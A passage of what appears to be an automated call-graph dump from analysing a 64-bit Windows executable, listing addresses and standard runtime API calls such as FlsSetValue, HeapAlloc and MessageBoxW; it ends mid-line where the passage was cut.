IsProcessorFeaturePresent 16448->16450 16449->16448 16451 7ff633d7a913 16450->16451 16532 7ff633d7a614 16451->16532 16455 7ff633d7b3ca FlsSetValue 16454->16455 16456 7ff633d7b3af FlsGetValue 16454->16456 16457 7ff633d7b3d7 16455->16457 16460 7ff633d7a5a3 SetLastError 16455->16460 16458 7ff633d7b3c4 16456->16458 16456->16460 16471 7ff633d7eb98 16457->16471 16458->16455 16460->16443 16462 7ff633d7b404 FlsSetValue 16465 7ff633d7b422 16462->16465 16466 7ff633d7b410 FlsSetValue 16462->16466 16463 7ff633d7b3f4 FlsSetValue 16464 7ff633d7b3fd 16463->16464 16478 7ff633d7a948 16464->16478 16484 7ff633d7aef4 16465->16484 16466->16464 16477 7ff633d7eba9 _get_daylight 16471->16477 16472 7ff633d7ebfa 16492 7ff633d74f08 16472->16492 16473 7ff633d7ebde HeapAlloc 16475 7ff633d7b3e6 16473->16475 16473->16477 16475->16462 16475->16463 16477->16472 16477->16473 16489 7ff633d83590 16477->16489 16479 7ff633d7a94d RtlFreeHeap 16478->16479 16481 7ff633d7a97c 16478->16481 16480 7ff633d7a968 GetLastError 16479->16480 16479->16481 16482 7ff633d7a975 Concurrency::details::SchedulerProxy::DeleteThis 16480->16482 16481->16460 16483 7ff633d74f08 _get_daylight 9 API calls 16482->16483 16483->16481 16518 7ff633d7adcc 16484->16518 16495 7ff633d835d0 16489->16495 16501 7ff633d7b2c8 GetLastError 16492->16501 16494 7ff633d74f11 16494->16475 16500 7ff633d802d8 EnterCriticalSection 16495->16500 16502 7ff633d7b2ec 16501->16502 16503 7ff633d7b309 FlsSetValue 16501->16503 16502->16503 16516 7ff633d7b2f9 16502->16516 16504 7ff633d7b31b 16503->16504 16503->16516 16506 7ff633d7eb98 _get_daylight 5 API calls 16504->16506 16505 7ff633d7b375 SetLastError 16505->16494 16507 7ff633d7b32a 16506->16507 16508 7ff633d7b348 FlsSetValue 16507->16508 16509 7ff633d7b338 FlsSetValue 16507->16509 16511 7ff633d7b366 16508->16511 16512 7ff633d7b354 FlsSetValue 16508->16512 16510 7ff633d7b341 16509->16510 16514 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 16510->16514 16513 7ff633d7aef4 _get_daylight 5 API calls 16511->16513 16512->16510 16515 7ff633d7b36e 16513->16515 16514->16516 16517 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 16515->16517 16516->16505 16517->16505 16530 7ff633d802d8 EnterCriticalSection 16518->16530 16533 7ff633d7a64e __GetCurrentState memcpy_s 16532->16533 16534 7ff633d7a676 RtlCaptureContext RtlLookupFunctionEntry 16533->16534 16535 7ff633d7a6e6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16534->16535 16536 7ff633d7a6b0 RtlVirtualUnwind 16534->16536 16538 7ff633d7a738 __GetCurrentState 16535->16538 16536->16535 16537 7ff633d6c550 _log10_special 8 API calls 16539 7ff633d7a757 GetCurrentProcess TerminateProcess 16537->16539 16538->16537 16542 7ff633d636bc GetModuleFileNameW 16541->16542 16542->16115 16542->16116 16544 7ff633d692bf FindClose 16543->16544 16545 7ff633d692d2 16543->16545 16544->16545 16546 7ff633d6c550 _log10_special 8 API calls 16545->16546 16547 7ff633d6371a 16546->16547 16547->16121 16547->16122 16549 7ff633d6c850 16548->16549 16550 7ff633d62c70 GetCurrentProcessId 16549->16550 16579 7ff633d626b0 16550->16579 16552 7ff633d62cb9 16583 7ff633d74bd8 16552->16583 16555 7ff633d626b0 48 API calls 16556 7ff633d62d34 FormatMessageW 16555->16556 16558 7ff633d62d6d 16556->16558 16559 7ff633d62d7f MessageBoxW 16556->16559 16560 7ff633d626b0 48 API calls 16558->16560 16561 7ff633d6c550 _log10_special 8 API calls 16559->16561 16560->16559 16562 7ff633d62daf 16561->16562 16562->16119 16564 7ff633d63730 16563->16564 16565 7ff633d69340 GetFinalPathNameByHandleW CloseHandle 16563->16565 16564->16129 16564->16130 16565->16564 16567 7ff633d62834 16566->16567 16568 7ff633d626b0 48 API calls 16567->16568 16569 7ff633d62887 16568->16569 16570 7ff633d74bd8 48 API calls 16569->16570 16571 7ff633d628d0 MessageBoxW 16570->16571 16572 7ff633d6c550 _log10_special 8 API calls 16571->16572 16573 7ff633d62900 16572->16573 16573->16119 16575 7ff633d6946a WideCharToMultiByte 16574->16575 16576 7ff633d69495 16574->16576 16575->16576 16578 7ff633d694ab __std_exception_copy 16575->16578 16577 7ff633d694b2 WideCharToMultiByte 16576->16577 16576->16578 16577->16578 16578->16126 16580 7ff633d626d5 16579->16580 16581 7ff633d74bd8 48 API calls 16580->16581 16582 7ff633d626f8 16581->16582 16582->16552 16587 7ff633d74c32 16583->16587 16584 7ff633d74c57 16585 7ff633d7a814 _invalid_parameter_noinfo 37 API calls 16584->16585 16589 7ff633d74c81 16585->16589 16586 7ff633d74c93 16601 7ff633d72f90 16586->16601 16587->16584 16587->16586 16591 7ff633d6c550 _log10_special 8 API calls 16589->16591 16593 7ff633d62d04 16591->16593 16592 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16592->16589 16593->16555 16594 7ff633d74d9a 16596 7ff633d74d74 16594->16596 16598 7ff633d74da4 16594->16598 16595 7ff633d74d49 16599 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16595->16599 16596->16592 16597 7ff633d74d40 16597->16595 16597->16596 16600 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16598->16600 16599->16589 16600->16589 16602 7ff633d72fce 16601->16602 16603 7ff633d72fbe 16601->16603 16604 7ff633d72fd7 16602->16604 16609 7ff633d73005 16602->16609 16605 7ff633d7a814 _invalid_parameter_noinfo 37 API calls 16603->16605 16606 7ff633d7a814 _invalid_parameter_noinfo 37 API calls 16604->16606 16607 7ff633d72ffd 16605->16607 16606->16607 16607->16594 16607->16595 16607->16596 16607->16597 16609->16603 16609->16607 16612 7ff633d739a4 16609->16612 16645 7ff633d733f0 16609->16645 16682 7ff633d72b80 16609->16682 16613 7ff633d739e6 16612->16613 16614 7ff633d73a57 16612->16614 16615 7ff633d739ec 16613->16615 16616 7ff633d73a81 16613->16616 16617 7ff633d73a5c 16614->16617 16618 7ff633d73ab0 16614->16618 16619 7ff633d73a20 16615->16619 16620 7ff633d739f1 16615->16620 16705 7ff633d71d54 16616->16705 16621 7ff633d73a91 16617->16621 16622 7ff633d73a5e 16617->16622 16624 7ff633d73ac7 16618->16624 16626 7ff633d73aba 16618->16626 16631 7ff633d73abf 16618->16631 16627 7ff633d739f7 16619->16627 16619->16631 16620->16624 16620->16627 16712 7ff633d71944 16621->16712 16625 7ff633d73a00 16622->16625 16634 7ff633d73a6d 16622->16634 16719 7ff633d746ac 16624->16719 16644 7ff633d73af0 16625->16644 16685 7ff633d74158 16625->16685 16626->16616 16626->16631 16627->16625 16632 7ff633d73a32 16627->16632 16641 7ff633d73a1b 16627->16641 16631->16644 16723 7ff633d72164 16631->16723 16632->16644 16695 7ff633d74494 16632->16695 16634->16616 16636 7ff633d73a72 16634->16636 16636->16644 16701 7ff633d74558 16636->16701 16637 7ff633d6c550 _log10_special 8 API calls 16639 7ff633d73dea 16637->16639 16639->16609 16643 7ff633d73cdc 16641->16643 16641->16644 16730 7ff633d747c0 16641->16730 16643->16644 16736 7ff633d7ea08 16643->16736 16644->16637 16646 7ff633d73414 16645->16646 16647 7ff633d733fe 16645->16647 16650 7ff633d7a814 _invalid_parameter_noinfo 37 API calls 16646->16650 16651 7ff633d73454 16646->16651 16648 7ff633d739e6 16647->16648 16649 7ff633d73a57 16647->16649 16647->16651 16652 7ff633d739ec 16648->16652 16653 7ff633d73a81 16648->16653 16654 7ff633d73a5c 16649->16654 16655 7ff633d73ab0 16649->16655 16650->16651 16651->16609 16656 7ff633d73a20 16652->16656 16657 7ff633d739f1 16652->16657 16660 7ff633d71d54 38 API calls 16653->16660 16658 7ff633d73a91 16654->16658 16659 7ff633d73a5e 16654->16659 16661 7ff633d73ac7 16655->16661 16663 7ff633d73aba 16655->16663 16667 7ff633d73abf 16655->16667 16664 7ff633d739f7 16656->16664 16656->16667 16657->16661 16657->16664 16665 7ff633d71944 38 API calls 16658->16665 16662 7ff633d73a00 16659->16662 16671 7ff633d73a6d 16659->16671 16678 7ff633d73a1b 16660->16678 16668 7ff633d746ac 45 API calls 16661->16668 16666 7ff633d74158 47 API calls 16662->16666 16681 7ff633d73af0 16662->16681 16663->16653 16663->16667 16664->16662 16669 7ff633d73a32 16664->16669 16664->16678 16665->16678 16666->16678 16670 7ff633d72164 38 API calls 16667->16670 16667->16681 16668->16678 16672 7ff633d74494 46 API calls 16669->16672 16669->16681 16670->16678 16671->16653 16673 7ff633d73a72 16671->16673 16672->16678 16675 7ff633d74558 37 API calls 16673->16675 16673->16681 16674 7ff633d6c550 _log10_special 8 API calls 16676 7ff633d73dea 16674->16676 16675->16678 16676->16609 16677 7ff633d747c0 45 API calls 16680 7ff633d73cdc 16677->16680 16678->16677 16678->16680 16678->16681 16679 7ff633d7ea08 46 API calls 16679->16680 16680->16679 16680->16681 16681->16674 16962 7ff633d70fc8 16682->16962 16686 7ff633d7417e 16685->16686 16748 7ff633d70b80 16686->16748 16691 7ff633d747c0 45 API calls 16693 7ff633d742c3 16691->16693 16692 7ff633d74351 16692->16641 16693->16692 16694 7ff633d747c0 45 API calls 16693->16694 16694->16692 16696 7ff633d744c9 16695->16696 16697 7ff633d744e7 16696->16697 16698 7ff633d747c0 45 API calls 16696->16698 16700 7ff633d7450e 16696->16700 16699 7ff633d7ea08 46 API calls 16697->16699 16698->16697 16699->16700 16700->16641 16702 7ff633d74579 16701->16702 16703 7ff633d7a814 _invalid_parameter_noinfo 37 API calls 16702->16703 16704 7ff633d745aa 16702->16704 16703->16704 16704->16641 16706 7ff633d71d87 16705->16706 16707 7ff633d71db6 16706->16707 16709 7ff633d71e73 16706->16709 16711 7ff633d71df3 16707->16711 16894 7ff633d70c28 16707->16894 16710 7ff633d7a814 _invalid_parameter_noinfo 37 API calls 16709->16710 16710->16711 16711->16641 16713 7ff633d71977 16712->16713 16714 7ff633d719a6 16713->16714 16716 7ff633d71a63 16713->16716 16715 7ff633d70c28 12 API calls 16714->16715 16718 7ff633d719e3 16714->16718 16715->16718 16717 7ff633d7a814 _invalid_parameter_noinfo 37 API calls 16716->16717 16717->16718 16718->16641 16720 7ff633d746ef 16719->16720 16722 7ff633d746f3 __crtLCMapStringW 16720->16722 16902 7ff633d74748 16720->16902 16722->16641 16724 7ff633d72197 16723->16724 16725 7ff633d721c6 16724->16725 16727 7ff633d72283 16724->16727 16726 7ff633d70c28 12 API calls 16725->16726 16729 7ff633d72203 16725->16729 16726->16729 16728 7ff633d7a814 _invalid_parameter_noinfo 37 API calls 16727->16728 16728->16729 16729->16641 16731 7ff633d747d7 16730->16731 16906 7ff633d7d9b8 16731->16906 16738 7ff633d7ea39 16736->16738 16744 7ff633d7ea47 16736->16744 16737 7ff633d7ea67 16740 7ff633d7ea78 16737->16740 16741 7ff633d7ea9f 16737->16741 16738->16737 16739 7ff633d747c0 45 API calls 16738->16739 16738->16744 16739->16737 16952 7ff633d800a0 16740->16952 16743 7ff633d7eb2a 16741->16743 16741->16744 16746 7ff633d7eac9 16741->16746 16745 7ff633d7f8a0 _fread_nolock MultiByteToWideChar 16743->16745 16744->16643 16745->16744 16746->16744 16955 7ff633d7f8a0 16746->16955 16749 7ff633d70bb7 16748->16749 16755 7ff633d70ba6 16748->16755 16749->16755 16778 7ff633d7d5fc 16749->16778 16752 7ff633d70bf8 16754 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16752->16754 16753 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16753->16752 16754->16755 16756 7ff633d7e570 16755->16756 16757 7ff633d7e5c0 16756->16757 16758 7ff633d7e58d 16756->16758 16757->16758 16760 7ff633d7e5f2 16757->16760 16759 7ff633d7a814 _invalid_parameter_noinfo 37 API calls 16758->16759 16768 7ff633d742a1 16759->16768 16766 7ff633d7e705 16760->16766 16773 7ff633d7e63a 16760->16773 16761 7ff633d7e7f7 16818 7ff633d7da5c 16761->16818 16763 7ff633d7e7bd 16811 7ff633d7ddf4 16763->16811 16765 7ff633d7e78c 16804 7ff633d7e0d4 16765->16804 16766->16761 16766->16763 16766->16765 16767 7ff633d7e74f 16766->16767 16770 7ff633d7e745 16766->16770 16794 7ff633d7e304 16767->16794 16768->16691 16768->16693 16770->16763 16772 7ff633d7e74a 16770->16772 16772->16765 16772->16767 16773->16768 16785 7ff633d7a4a4 16773->16785 16776 7ff633d7a900 _isindst 17 API calls 16777 7ff633d7e854 16776->16777 16779 7ff633d7d60b _get_daylight 16778->16779 16780 7ff633d7d647 16778->16780 16779->16780 16782 7ff633d7d62e HeapAlloc 16779->16782 16784 7ff633d83590 _get_daylight 2 API calls 16779->16784 16781 7ff633d74f08 _get_daylight 11 API calls 16780->16781 16783 7ff633d70be4 16781->16783 16782->16779 16782->16783 16783->16752 16783->16753 16784->16779 16786 7ff633d7a4bb 16785->16786 16787 7ff633d7a4b1 16785->16787 16788 7ff633d74f08 _get_daylight 11 API calls 16786->16788 16787->16786 16790 7ff633d7a4d6 16787->16790 16793 7ff633d7a4c2 16788->16793 16791 7ff633d7a4ce 16790->16791 16792 7ff633d74f08 _get_daylight 11 API calls 16790->16792 16791->16768 16791->16776 16792->16793 16827 7ff633d7a8e0 16793->16827 16830 7ff633d840ac 16794->16830 16798 7ff633d7e3ac 16799 7ff633d7e401 16798->16799 16800 7ff633d7e3cc 16798->16800 16803 7ff633d7e3b0 16798->16803 16883 7ff633d7def0 16799->16883 16879 7ff633d7e1ac 16800->16879 16803->16768 16805 7ff633d840ac 38 API calls 16804->16805 16806 7ff633d7e11e 16805->16806 16807 7ff633d83af4 37 API calls 16806->16807 16808 7ff633d7e16e 16807->16808 16809 7ff633d7e172 16808->16809 16810 7ff633d7e1ac 45 API calls 16808->16810 16809->16768 16810->16809 16812 7ff633d840ac 38 API calls 16811->16812 16813 7ff633d7de3f 16812->16813 16814 7ff633d83af4 37 API calls 16813->16814 16815 7ff633d7de97 16814->16815 16816 7ff633d7de9b 16815->16816 16817 7ff633d7def0 45 API calls 16815->16817 16816->16768 16817->16816 16819 7ff633d7dad4 16818->16819 16820 7ff633d7daa1 16818->16820 16821 7ff633d7daec 16819->16821 16825 7ff633d7db6d 16819->16825 16822 7ff633d7a814 _invalid_parameter_noinfo 37 API calls 16820->16822 16823 7ff633d7ddf4 46 API calls 16821->16823 16824 7ff633d7dacd memcpy_s 16822->16824 16823->16824 16824->16768 16825->16824 16826 7ff633d747c0 45 API calls 16825->16826 16826->16824 16828 7ff633d7a778 _invalid_parameter_noinfo 37 API calls 16827->16828 16829 7ff633d7a8f9 16828->16829 16829->16791 16831 7ff633d840ff fegetenv 16830->16831 16832 7ff633d87e2c 37 API calls 16831->16832 16835 7ff633d84152 16832->16835 16833 7ff633d8417f 16837 7ff633d7a4a4 __std_exception_copy 37 API calls 16833->16837 16834 7ff633d84242 16836 7ff633d87e2c 37 API calls 16834->16836 16835->16834 16840 7ff633d8421c 16835->16840 16841 7ff633d8416d 16835->16841 16838 7ff633d8426c 16836->16838 16839 7ff633d841fd 16837->16839 16842 7ff633d87e2c 37 API calls 16838->16842 16843 7ff633d85324 16839->16843 16849 7ff633d84205 16839->16849 16844 7ff633d7a4a4 __std_exception_copy 37 API calls 16840->16844 16841->16833 16841->16834 16845 7ff633d8427d 16842->16845 16846 7ff633d7a900 _isindst 17 API calls 16843->16846 16844->16839 16847 7ff633d88020 20 API calls 16845->16847 16848 7ff633d85339 16846->16848 16852 7ff633d842e6 memcpy_s 16847->16852 16850 7ff633d6c550 _log10_special 8 API calls 16849->16850 16851 7ff633d7e351 16850->16851 16875 7ff633d83af4 16851->16875 16853 7ff633d8468f memcpy_s 16852->16853 16855 7ff633d84327 memcpy_s 16852->16855 16859 7ff633d74f08 _get_daylight 11 API calls 16852->16859 16854 7ff633d849cf 16856 7ff633d83c10 37 API calls 16854->16856 16870 7ff633d84c6b memcpy_s 16855->16870 16871 7ff633d84783 memcpy_s 16855->16871 16861 7ff633d850e7 16856->16861 16857 7ff633d8497b 16857->16854 16858 7ff633d8533c memcpy_s 37 API calls 16857->16858 16858->16854 16860 7ff633d84760 16859->16860 16862 7ff633d7a8e0 _invalid_parameter_noinfo 37 API calls 16860->16862 16863 7ff633d8533c memcpy_s 37 API calls 16861->16863 16874 7ff633d85142 16861->16874 16862->16855 16863->16874 16864 7ff633d852c8 16867 7ff633d87e2c 37 API calls 16864->16867 16865 7ff633d74f08 11 API calls _get_daylight 16865->16870 16866 7ff633d74f08 11 API calls _get_daylight 16866->16871 16867->16849 16868 7ff633d83c10 37 API calls 16868->16874 16869 7ff633d7a8e0 37 API calls _invalid_parameter_noinfo 16869->16870 16870->16854 16870->16857 16870->16865 16870->16869 16871->16857 16871->16866 16872 7ff633d7a8e0 37 API calls _invalid_parameter_noinfo 16871->16872 16872->16871 16873 7ff633d8533c memcpy_s 37 API calls 16873->16874 16874->16864 16874->16868 16874->16873 16876 7ff633d83b13 16875->16876 16877 7ff633d7a814 _invalid_parameter_noinfo 37 API calls 16876->16877 16878 7ff633d83b3e memcpy_s 16876->16878 16877->16878 16878->16798 16880 7ff633d7e1d8 memcpy_s 16879->16880 16881 7ff633d747c0 45 API calls 16880->16881 16882 7ff633d7e292 memcpy_s 16880->16882 16881->16882 16882->16803 16884 7ff633d7df2b 16883->16884 16888 7ff633d7df78 memcpy_s 16883->16888 16885 7ff633d7a814 _invalid_parameter_noinfo 37 API calls 16884->16885 16886 7ff633d7df57 16885->16886 16886->16803 16887 7ff633d7dfe3 16889 7ff633d7a4a4 __std_exception_copy 37 API calls 16887->16889 16888->16887 16890 7ff633d747c0 45 API calls 16888->16890 16893 7ff633d7e025 memcpy_s 16889->16893 16890->16887 16891 7ff633d7a900 _isindst 17 API calls 16892 7ff633d7e0d0 16891->16892 16893->16891 16895 7ff633d70c5f 16894->16895 16901 7ff633d70c4e 16894->16901 16896 7ff633d7d5fc _fread_nolock 12 API calls 16895->16896 16895->16901 16897 7ff633d70c90 16896->16897 16898 7ff633d70ca4 16897->16898 16899 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16897->16899 16900 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16898->16900 16899->16898 16900->16901 16901->16711 16903 7ff633d74766 16902->16903 16905 7ff633d7476e 16902->16905 16904 7ff633d747c0 45 API calls 16903->16904 16904->16905 16905->16722 16907 7ff633d747ff 16906->16907 16908 7ff633d7d9d1 16906->16908 16910 7ff633d7da24 16907->16910 16908->16907 16914 7ff633d83304 16908->16914 16911 7ff633d7da3d 16910->16911 16912 7ff633d7480f 16910->16912 16911->16912 16949 7ff633d82650 16911->16949 16912->16643 16926 7ff633d7b150 GetLastError 16914->16926 16917 7ff633d8335e 16917->16907 16927 7ff633d7b174 FlsGetValue 16926->16927 16928 7ff633d7b191 FlsSetValue 16926->16928 16929 7ff633d7b18b 16927->16929 16945 7ff633d7b181 16927->16945 16930 7ff633d7b1a3 16928->16930 16928->16945 16929->16928 16932 7ff633d7eb98 _get_daylight 11 API calls 16930->16932 16931 7ff633d7b1fd SetLastError 16933 7ff633d7b21d 16931->16933 16934 7ff633d7b20a 16931->16934 16935 7ff633d7b1b2 16932->16935 16936 7ff633d7a504 __GetCurrentState 38 API calls 16933->16936 16934->16917 16948 7ff633d802d8 EnterCriticalSection 16934->16948 16937 7ff633d7b1d0 FlsSetValue 16935->16937 16938 7ff633d7b1c0 FlsSetValue 16935->16938 16939 7ff633d7b222 16936->16939 16941 7ff633d7b1dc FlsSetValue 16937->16941 16942 7ff633d7b1ee 16937->16942 16940 7ff633d7b1c9 16938->16940 16943 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16940->16943 16941->16940 16944 7ff633d7aef4 _get_daylight 11 API calls 16942->16944 16943->16945 16946 7ff633d7b1f6 16944->16946 16945->16931 16947 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16946->16947 16947->16931 16950 7ff633d7b150 __GetCurrentState 45 API calls 16949->16950 16951 7ff633d82659 16950->16951 16958 7ff633d86d88 16952->16958 16957 7ff633d7f8a9 MultiByteToWideChar 16955->16957 16961 7ff633d86dec 16958->16961 16959 7ff633d6c550 _log10_special 8 API calls 16960 7ff633d800bd 16959->16960 16960->16744 16961->16959 16963 7ff633d70ffd 16962->16963 16964 7ff633d7100f 16962->16964 16965 7ff633d74f08 _get_daylight 11 API calls 16963->16965 16966 7ff633d71059 16964->16966 16968 7ff633d7101d 16964->16968 16967 7ff633d71002 16965->16967 16971 7ff633d713d5 16966->16971 16973 7ff633d74f08 _get_daylight 11 API calls 16966->16973 16969 7ff633d7a8e0 _invalid_parameter_noinfo 37 API calls 16967->16969 16970 7ff633d7a814 _invalid_parameter_noinfo 37 API calls 16968->16970 16974 7ff633d7100d 16969->16974 16970->16974 16972 7ff633d74f08 _get_daylight 11 API calls 16971->16972 16971->16974 16975 7ff633d71669 16972->16975 16976 7ff633d713ca 16973->16976 16974->16609 16977 7ff633d7a8e0 _invalid_parameter_noinfo 37 API calls 16975->16977 16978 7ff633d7a8e0 _invalid_parameter_noinfo 37 API calls 16976->16978 16977->16974 16978->16971 16980 7ff633d70704 16979->16980 17007 7ff633d70464 16980->17007 16982 7ff633d7071d 16982->16144 17019 7ff633d703bc 16983->17019 16987 7ff633d6c850 16986->16987 16988 7ff633d62930 GetCurrentProcessId 16987->16988 16989 7ff633d61c80 49 API calls 16988->16989 16990 7ff633d62979 16989->16990 17033 7ff633d74984 16990->17033 16995 7ff633d61c80 49 API calls 16996 7ff633d629ff 16995->16996 17063 7ff633d62620 16996->17063 16999 7ff633d6c550 _log10_special 8 API calls 17000 7ff633d62a31 16999->17000 17000->16183 17002 7ff633d70119 17001->17002 17006 7ff633d61b89 17001->17006 17003 7ff633d74f08 _get_daylight 11 API calls 17002->17003 17004 7ff633d7011e 17003->17004 17005 7ff633d7a8e0 _invalid_parameter_noinfo 37 API calls 17004->17005 17005->17006 17006->16182 17006->16183 17008 7ff633d704ce 17007->17008 17009 7ff633d7048e 17007->17009 17008->17009 17010 7ff633d704da 17008->17010 17011 7ff633d7a814 _invalid_parameter_noinfo 37 API calls 17009->17011 17018 7ff633d7546c EnterCriticalSection 17010->17018 17013 7ff633d704b5 17011->17013 17013->16982 17020 7ff633d703e6 17019->17020 17031 7ff633d61a20 17019->17031 17021 7ff633d703f5 memcpy_s 17020->17021 17022 7ff633d70432 17020->17022 17020->17031 17025 7ff633d74f08 _get_daylight 11 API calls 17021->17025 17032 7ff633d7546c EnterCriticalSection 17022->17032 17027 7ff633d7040a 17025->17027 17029 7ff633d7a8e0 _invalid_parameter_noinfo 37 API calls 17027->17029 17029->17031 17031->16152 17031->16153 17035 7ff633d749de 17033->17035 17034 7ff633d74a03 17036 7ff633d7a814 _invalid_parameter_noinfo 37 API calls 17034->17036 17035->17034 17037 7ff633d74a3f 17035->17037 17040 7ff633d74a2d 17036->17040 17072 7ff633d72c10 17037->17072 17039 7ff633d74b1c 17042 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17039->17042 17041 7ff633d6c550 _log10_special 8 API calls 17040->17041 17044 7ff633d629c3 17041->17044 17042->17040 17051 7ff633d75160 17044->17051 17045 7ff633d74b40 17045->17039 17048 7ff633d74b4a 17045->17048 17046 7ff633d74af1 17049 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17046->17049 17047 7ff633d74ae8 17047->17039 17047->17046 17050 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17048->17050 17049->17040 17050->17040 17052 7ff633d7b2c8 _get_daylight 11 API calls 17051->17052 17053 7ff633d75177 17052->17053 17054 7ff633d629e5 17053->17054 17055 7ff633d7eb98 _get_daylight 11 API calls 17053->17055 17058 7ff633d751b7 17053->17058 17054->16995 17056 7ff633d751ac 17055->17056 17057 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17056->17057 17057->17058 17058->17054 17210 7ff633d7ec20 17058->17210 17061 7ff633d7a900 _isindst 17 API calls 17062 7ff633d751fc 17061->17062 17064 7ff633d6262f 17063->17064 17065 7ff633d69390 2 API calls 17064->17065 17066 7ff633d62660 17065->17066 17067 7ff633d62683 MessageBoxA 17066->17067 17068 7ff633d6266f MessageBoxW 17066->17068 17069 7ff633d62690 17067->17069 17068->17069 17070 7ff633d6c550 _log10_special 8 API calls 17069->17070 17071 7ff633d626a0 17070->17071 17071->16999 17073 7ff633d72c4e 17072->17073 17074 7ff633d72c3e 17072->17074 17075 7ff633d72c57 17073->17075 17079 7ff633d72c85 17073->17079 17076 7ff633d7a814 _invalid_parameter_noinfo 37 API calls 17074->17076 17077 7ff633d7a814 _invalid_parameter_noinfo 37 API calls 17075->17077 17078 7ff633d72c7d 17076->17078 17077->17078 17078->17039 17078->17045 17078->17046 17078->17047 17079->17074 17079->17078 17080 7ff633d747c0 45 API calls 17079->17080 17082 7ff633d72f34 17079->17082 17086 7ff633d735a0 17079->17086 17112 7ff633d73268 17079->17112 17142 7ff633d72af0 17079->17142 17080->17079 17084 7ff633d7a814 _invalid_parameter_noinfo 37 API calls 17082->17084 17084->17074 17087 7ff633d73655 17086->17087 17088 7ff633d735e2 17086->17088 17091 7ff633d7365a 17087->17091 17092 7ff633d736af 17087->17092 17089 7ff633d735e8 17088->17089 17090 7ff633d7367f 17088->17090 17097 7ff633d735ed 17089->17097 17103 7ff633d736be 17089->17103 17159 7ff633d71b50 17090->17159 17093 7ff633d7365c 17091->17093 17094 7ff633d7368f 17091->17094 17092->17090 17092->17103 17110 7ff633d73618 17092->17110 17096 7ff633d735fd 17093->17096 17102 7ff633d7366b 17093->17102 17166 7ff633d71740 17094->17166 17111 7ff633d736ed 17096->17111 17145 7ff633d73f04 17096->17145 17097->17096 17100 7ff633d73630 17097->17100 17097->17110 17100->17111 17155 7ff633d743c0 17100->17155 17102->17090 17106 7ff633d73670 17102->17106 17103->17111 17173 7ff633d71f60 17103->17173 17105 7ff633d6c550 _log10_special 8 API calls 17108 7ff633d73983 17105->17108 17107 7ff633d74558 37 API calls 17106->17107 17106->17111 17107->17110 17108->17079 17110->17111 17180 7ff633d7e858 17110->17180 17111->17105 17113 7ff633d73289 17112->17113 17114 7ff633d73273 17112->17114 17117 7ff633d7a814 _invalid_parameter_noinfo 37 API calls 17113->17117 17118 7ff633d732c7 17113->17118 17115 7ff633d73655 17114->17115 17116 7ff633d735e2 17114->17116 17114->17118 17121 7ff633d7365a 17115->17121 17122 7ff633d736af 17115->17122 17119 7ff633d735e8 17116->17119 17120 7ff633d7367f 17116->17120 17117->17118 17118->17079 17129 7ff633d735ed 17119->17129 17131 7ff633d736be 17119->17131 17125 7ff633d71b50 38 API calls 17120->17125 17123 7ff633d7365c 17121->17123 17124 7ff633d7368f 17121->17124 17122->17120 17122->17131 17140 7ff633d73618 17122->17140 17126 7ff633d735fd 17123->17126 17133 7ff633d7366b 17123->17133 17127 7ff633d71740 38 API calls 17124->17127 17125->17140 17128 7ff633d73f04 47 API calls 17126->17128 17141 7ff633d736ed 17126->17141 17127->17140 17128->17140 17129->17126 17130 7ff633d73630 17129->17130 17129->17140 17134 7ff633d743c0 47 API calls 17130->17134 17130->17141 17132 7ff633d71f60 38 API calls 17131->17132 17131->17141 17132->17140 17133->17120 17135 7ff633d73670 17133->17135 17134->17140 17137 7ff633d74558 37 API calls 17135->17137 17135->17141 17136 7ff633d6c550 _log10_special 8 API calls 17138 7ff633d73983 17136->17138 17137->17140 17138->17079 17139 7ff633d7e858 47 API calls 17139->17140 17140->17139 17140->17141 17141->17136 17193 7ff633d70d14 17142->17193 17146 7ff633d73f26 17145->17146 17147 7ff633d70b80 12 API calls 17146->17147 17148 7ff633d73f6e 17147->17148 17149 7ff633d7e570 46 API calls 17148->17149 17150 7ff633d74041 17149->17150 17151 7ff633d74063 17150->17151 17152 7ff633d747c0 45 API calls 17150->17152 17153 7ff633d747c0 45 API calls 17151->17153 17154 7ff633d740ec 17151->17154 17152->17151 17153->17154 17154->17110 17156 7ff633d743d8 17155->17156 17158 7ff633d74440 17155->17158 17157 7ff633d7e858 47 API calls 17156->17157 17156->17158 17157->17158 17158->17110 17161 7ff633d71b83 17159->17161 17160 7ff633d71bb2 17162 7ff633d70b80 12 API calls 17160->17162 17165 7ff633d71bef 17160->17165 17161->17160 17163 7ff633d71c6f 17161->17163 17162->17165 17164 7ff633d7a814 _invalid_parameter_noinfo 37 API calls 17163->17164 17164->17165 17165->17110 17167 7ff633d71773 17166->17167 17168 7ff633d717a2 17167->17168 17170 7ff633d7185f 17167->17170 17169 7ff633d70b80 12 API calls 17168->17169 17172 7ff633d717df 17168->17172 17169->17172 17171 7ff633d7a814 _invalid_parameter_noinfo 37 API calls 17170->17171 17171->17172 17172->17110 17174 7ff633d71f93 17173->17174 17175 7ff633d71fc2 17174->17175 17177 7ff633d7207f 17174->17177 17176 7ff633d70b80 12 API calls 17175->17176 17179 7ff633d71fff 17175->17179 17176->17179 17178 7ff633d7a814 _invalid_parameter_noinfo 37 API calls 17177->17178 17178->17179 17179->17110 17181 7ff633d7e880 17180->17181 17182 7ff633d7e8c5 17181->17182 17184 7ff633d747c0 45 API calls 17181->17184 17186 7ff633d7e885 memcpy_s 17181->17186 17189 7ff633d7e8ae memcpy_s 17181->17189 17182->17186 17182->17189 17190 7ff633d807e8 17182->17190 17183 7ff633d7a814 